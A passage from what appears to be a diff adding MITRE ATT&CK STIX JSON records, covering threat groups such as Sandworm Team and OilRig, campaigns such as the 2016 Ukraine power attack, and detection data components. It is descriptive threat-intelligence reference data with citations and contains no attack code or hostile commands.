Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", + "modified": "2022-05-11T14:00:00.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dragonfly 2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-11-30T22:46:40.135Z", + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. 
The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "created": "2019-04-16T15:14:38.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0088", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + }, + { + "source_name": "FireEye TEMP.Veles 2018", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + }, + { + "source_name": "FireEye TRITON 2019", + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. 
Retrieved April 29, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + }, + { + "source_name": "Pylos Xenotime 2019", + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Application Log Content", + "description": "Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-10T21:18:24.743Z", + "name": "2016 Ukraine Electric Power Attack", + "description": "[2016 Ukraine Electric Power 
Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "aliases": [ + "2016 Ukraine Electric Power Attack" + ], + "first_seen": "2016-12-01T05:00:00.000Z", + "last_seen": "2016-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_last_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "created": "2023-03-31T17:22:23.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0025", + "external_id": "C0025" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. 
Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ] + }, + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + 
"aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks 
IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). 
Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . 
Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-05T22:00:43.353Z", + "name": "Maroochy Water Breach", + "description": "[Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020) was an incident in 2000 where an adversary leveraged the local government’s wastewater control system and stolen engineering equipment to disrupt and eventually release 800,000 liters of raw sewage into the local community.(Citation: Marshall Abrams July 2008)", + "aliases": [ + "Maroochy Water Breach" + ], + "first_seen": "2000-02-01T05:00:00.000Z", + "last_seen": "2000-04-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Marshall Abrams July 2008)", + 
"x_mitre_last_seen_citation": "(Citation: Marshall Abrams July 2008)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "created": "2023-03-10T20:01:08.133Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0020", + "external_id": "C0020" + }, + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + }, + { + "modified": "2022-10-07T16:16:55.269Z", + "name": "Script Execution", + "description": "The execution of a text file that contains code via the interpreter (e.g. 
Powershell, WMI, Windows EID 4104, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Module Load", + "description": "Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)", + "x_mitre_data_source_ref": 
"x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Modification", + "description": "Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": 
"2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "name": "Process History/Live Data", + "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T04:43:59.082Z", + "name": "HEXANE", + "description": "[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)", + "aliases": [ + "HEXANE", + "Lyceum", + "Siamesekitten", + "Spirlin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Mindaugas Gudzis, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1001", + "external_id": "G1001" + 
}, + { + "source_name": "Spirlin", + "description": "(Citation: Accenture Lyceum Targets November 2021)" + }, + { + "source_name": "Siamesekitten", + "description": "(Citation: ClearSky Siamesekitten August 2021)" + }, + { + "source_name": "Lyceum", + "description": "(Citation: SecureWorks August 2019)" + }, + { + "source_name": "Accenture Lyceum Targets November 2021", + "description": "Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns" + }, + { + "source_name": "ClearSky Siamesekitten August 2021", + "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.", + "url": "https://www.clearskysec.com/siamesekitten/" + }, + { + "source_name": "Dragos Hexane", + "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.", + "url": "https://dragos.com/resource/hexane/" + }, + { + "source_name": "Kaspersky Lyceum October 2021", + "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.", + "url": "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" + }, + { + "source_name": "SecureWorks August 2019", + "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 
2019/11/19 ", + "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "name": "Device Alarm", + "description": "This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-21T21:47:33.604Z", + "name": "Software", + "description": "This includes sources of current and expected software or application programs deployed to a device, along with information on the version and patch level for vendor products, full source code for any application programs, and unique identifiers (e.g., hashes, signatures).", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "created": "2022-09-23T16:36:08.632Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Creation", + "description": "Initial construction of a new file (ex: Sysmon EID 11)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Modification", + "description": "Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-02-06T20:58:52.317Z", + "name": "OilRig", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. 
FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)", + "aliases": [ + "OilRig", + "COBALT GYPSY", + "IRN2", + "APT34", + "Helix Kitten", + "Evasive Serpens" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Robert Falcone", + "Bryan Lee", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": 